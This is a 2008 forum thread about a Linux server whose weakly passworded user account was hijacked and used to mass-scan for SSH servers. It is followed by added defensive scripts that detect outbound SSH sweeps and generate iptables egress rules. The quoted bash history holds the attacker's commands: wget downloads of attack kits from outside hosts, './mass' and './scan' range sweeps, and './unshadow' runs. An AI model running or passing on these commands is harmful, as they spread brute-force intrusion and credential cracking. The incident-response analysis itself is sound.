Re: Possible attack?

Posted by Anon E. Muss on September 19, 2008, 3:15 pm

On Fri, 19 Sep 2008 17:17:13 +0000 (UTC), Sylvain Robitaille

>Anon E Muss wrote:
>
>> Below is most of output of netstat. Can someone let me know what is
>> going on here?

[...]

>Your machine is port-scanning what appears to be 218.0.0.0/11 for ssh
>servers. You need to make it stop that. If you blocked 201/8
>yesterday, and 218/8 today, you might want to try to find what data it
>gathered in the meantime for 202/8 to 217/8. More seriously, you need
>to identify the process that is performing the scan, and stop it. Then
>you need to figure out how it got there and deal with that.
>
>> ... any suggestions??
>
>Look for a probable compromise by similar means. Judging by the
>client-side ports (on your system) used in the scan, I don't think that
>a privileged account was compromised (and therefore your system itself
>is probably not compromised, unless the compromised account was able to
>use local privilege escalation). Another frequent source of account
>compromise seems to be some web-based services.

One of my users had a stupid password and had his account compromised.
Upon reviewing the logs, it looks like this was going on for about 4
days:

$ cat .bash_history

[...]
passwd
w
uname -a
cat /proc/cpuinfo
ls -a
uptime
cat /proc/cpuinfo
w
ls -a
w
uanme -a
uname -a
ls -a
w
uname -a
ps -x
w
ls -a
wget http://www12.asphost4free.com/marmy/ssh.tgz
tar zxvf ssh.tgz
rm -rf ssh.tgz
cd ssh
chmod +x *
wget http://nasa-undernet.ucoz.org/screen.tgz
tar zxvf screen.tgz
rm -rf screen.tgz
chmod +x *
screen -r
screen
./mass 117
cd ssh
./screen -r
ls -a
ps x
kill -9 12305
nano vuln.txt
ps x
ls -a
cd ..
rm -rf ssh
ls -a
w
ls -a
uname -a
cat /proc/cpuinfo
ls -a
uname -a
uptime
ps x
cat /proc/cpuinfo
ls -a
cat /proc/cpuinfo
ftp 61.184.136.12
ftp 61.184.136.12
tar zxvf webmin.tgz
cd webmin
./scan 79.15
./scan 91.80
./scan 161.53
./unshadow 161.53/
./scan 200.168
./unshadow 200.168/
./scan 201.10
./scan 202.66
./scan 92.114
./unshadow 92.114
cd
ls
cd webmin
ls
cd
wget http://www12.asphost4free.com/marmy/ssh.tgz
tar zxvf ssh.tgz
cd ssh
http://www12.asphost4free.com/mrtiger/screen.tgz
wget http://www12.asphost4free.com/mrtiger/screen.tgz
tar zxvf screen.tgz
rm -rf screen.tgz
./screen
./mass 61
./screen
w
passwd
w
uname -a
cat /proc/cpuinfo
uname -a
w
cat /proc/cpuinfo
ls -a
cd webmin
ls -a
./scan 69.13
./unshadow 69.13/
w
ls -a
cd ssh
ls -a
cat vuln.txt
cd ..
cd webmin
./scan 82.146
ls -a
cd ..
ls -a
cd ssh
ls -a
screen
w
ls -a
cd ssh
ls -a
./screen -r
screen -wipe
cat culn.txt
cat vuln.txt
ls -a
./screen
w
ls -a
cd ssh
./screen -r
cat vuln.txt
cd ssh
./screen -r
cat vuln.txt
cd ssh
cat vuln.txt
screen -r
ps x
./screen -r
./mass 62
./mass 61
cd ssh
cat vuln.txt
screen -r
./screen -r
./screen -wipe
./screen
ls -a
cd ssh
./screen -r
cat vuln.txt
./screen -r
cat vuln.txt
./mass 201
cd ssh
./screen -r
cat vuln.txt
ls +a
./screen
cd ssh
cat vuln.txt
screen -r
./screen -r
./screen -r
./screen -r
cd ..
ls -a
wget joke4u.diinoweb.com/files/Cristina.tgz
rm -rf Cristina.tgz
cd ssh
./screen -r
./mass 218
cd ssh
./screen -r
[...]

>I hope I've helped ...

You did. Thanks.

I also installed "fail2ban" as someone else advised.
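Sylvain's first piece of advice above is to identify the process performing the scan before anything else. The script below is an added example, not part of the thread: it reads `netstat -tnp` style output and reports any local process with a suspicious number of outbound connections whose foreign port is 22, which is exactly the pattern a `./mass`-style SSH sweep leaves behind. The sample netstat text, the PID 4711 and the addresses in it are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): find the local process behind an
# outbound SSH sweep from "netstat -tnp" output. On a live box, as root:
#     netstat -tnp | find_ssh_scanners 5
# The sample below is constructed; PIDs, program names and addresses are made up.
SAMPLE_NETSTAT='Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.0.2.10:22           198.51.100.7:51234      ESTABLISHED 1234/sshd: user
tcp        0      1 192.0.2.10:38112        218.12.5.9:22           SYN_SENT    4711/./mass
tcp        0      1 192.0.2.10:38113        218.12.5.10:22          SYN_SENT    4711/./mass
tcp        0      1 192.0.2.10:38114        218.12.5.11:22          SYN_SENT    4711/./mass
tcp        0      0 192.0.2.10:38115        218.12.5.12:22          ESTABLISHED 4711/./mass
tcp        0      1 192.0.2.10:38116        218.12.5.13:22          SYN_SENT    4711/./mass
tcp        0      0 192.0.2.10:45001        203.0.113.44:443        ESTABLISHED 2222/curl'

# find_ssh_scanners [THRESHOLD]   (reads netstat -tnp output on stdin)
# Prints "PID/Program count" for every local process that has at least
# THRESHOLD (default 5) outbound connections to a foreign port 22.
# "Outbound" = foreign port is 22 and the local port is ephemeral (>1024),
# which separates a scanner from our own sshd answering inbound sessions.
find_ssh_scanners() {
    threshold="${1:-5}"
    awk -v thr="$threshold" '
        ($1 == "tcp" || $1 == "tcp6") {
            n = split($5, fa, ":"); fport = fa[n]   # foreign port = text after last ":"
            m = split($4, la, ":"); lport = la[m]   # local port likewise
            if (fport == "22" && lport + 0 > 1024) count[$7]++   # $7 = PID/Program name
        }
        END { for (p in count) if (count[p] >= thr) print p, count[p] }
    ' | sort
}

# Stand-alone demo on the constructed sample: reports "4711/./mass 5".
printf '%s\n' "$SAMPLE_NETSTAT" | find_ssh_scanners 3
```

Once the PID is known, `ls -l /proc/PID/exe /proc/PID/cwd` and `cat /proc/PID/cmdline` tell you which binary and directory it runs from; record that before killing it, since the attacker's own history shows `rm -rf ssh` being used to tidy up afterwards.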

Posted by Tim Greer on September 19, 2008, 6:48 pm

Anon E. Muss wrote:

> On Fri, 19 Sep 2008 17:17:13 +0000 (UTC), Sylvain Robitaille
>
>>Anon E Muss wrote:
>>
>>> Below is most of output of netstat. Can someone let me know what is
>>> going on here?
>
> [...]
>
>>Your machine is port-scanning what appears to be 218.0.0.0/11 for ssh
>>servers. You need to make it stop that. If you blocked 201/8
>>yesterday, and 218/8 today, you might want to try to find what data it
>>gathered in the meantime for 202/8 to 217/8. More seriously, you need
>>to identify the process that is performing the scan, and stop it.
>>Then you need to figure out how it got there and deal with that.
>>
>>> ... any suggestions??
>>
>>Look for a probable compromise by similar means. Judging by the
>>client-side ports (on your system) used in the scan, I don't think
>>that a privileged account was compromised (and therefore your system
>>itself is probably not compromised, unless the compromised account was
>>able to
>>use local privilege escalation). Another frequent source of account
>>compromise seems to be some web-based services.
>
> One of my users had a stupid password and had his account compromised.
> Upon reviewing the logs, it looks like this was going on for about 4
> days:
>
> $ cat .bash_history
>

<snip>

You should block outgoing requests to port 22, and only allow trusted
destinations, so your server can't be the source of an attack again.
Do the same for other similar ports/services. Also, consider applying
some rate limit policies for the ones you do trust as destinations.
Additionally, you should report the sites in question the files were
downloaded from and add some mod_security rules (if you use Apache) for
POST/GET requests for those file names, and block outgoing access to
those servers as well. Finally, you should be sure you don't allow any
users to bind services to ports above 1024 without verifying they are
okay (if you allow that at all).
--
Tim Greer, CEO/Founder/CTO, BurlyHost.com, Inc.
Shared Hosting, Reseller Hosting, Dedicated & Semi-Dedicated servers
and Custom Hosting. 24/7 support, 30 day guarantee, secure servers.
Industry's most experienced staff! -- Web Hosting With Muscle!
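Tim's suggestion of blocking outbound port 22 except to trusted destinations, with a rate limit even on those, maps directly onto a small iptables egress chain. The generator below is an added example and not Tim's or the thread's code; it prints the rules instead of applying them so they can be reviewed, and the chain name, log prefix and the limit values are my own choices.

```shell
#!/bin/sh
# Added example (not from the thread): build an iptables egress policy for
# tcp/22 that only allows new SSH connections to trusted destinations, rate
# limits even those, and logs + rejects everything else. Rules are printed,
# not applied; review them, then run as root:  ssh_egress_rules DEST... | sh
# Chain name SSH_EGRESS, the log prefix and the limits are assumptions.

# ssh_egress_rules DEST [DEST...]
# DEST is an address or CIDR block this host legitimately needs to ssh to.
ssh_egress_rules() {
    if [ "$#" -lt 1 ]; then
        echo "usage: ssh_egress_rules DEST [DEST...]" >&2
        return 1
    fi
    chain=SSH_EGRESS
    # Dedicated chain so the policy can be flushed and reloaded on its own.
    echo "iptables -N $chain"
    echo "iptables -F $chain"
    # Packets of sessions already accepted are not new connections; pass them
    # through without counting them against the rate limit.
    echo "iptables -A $chain -m conntrack --ctstate ESTABLISHED,RELATED -j RETURN"
    for dest in "$@"; do
        # At most 10 new ssh connections per minute (burst 20) per trusted destination.
        echo "iptables -A $chain -d $dest -m conntrack --ctstate NEW -m limit --limit 10/min --limit-burst 20 -j ACCEPT"
    done
    # Everything else: log (itself rate limited so a scanner cannot flood the log)
    # and reject with a reset so the calling program fails fast.
    echo "iptables -A $chain -m limit --limit 5/min -j LOG --log-prefix \"ssh-egress-denied: \""
    echo "iptables -A $chain -j REJECT --reject-with tcp-reset"
    # Finally, send all outbound tcp/22 through the chain.
    echo "iptables -A OUTPUT -p tcp --dport 22 -j $chain"
}

# Stand-alone demo with two constructed trusted destinations.
ssh_egress_rules 203.0.113.5 198.51.100.0/24
```

The `ssh-egress-denied:` log lines double as a detector: a burst of them from one UID is the same signal the original `netstat` output gave, but caught at the first connection attempt rather than days later. The same shape of chain applies to the other ports Tim mentions; only the `--dport` and the trusted list change.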
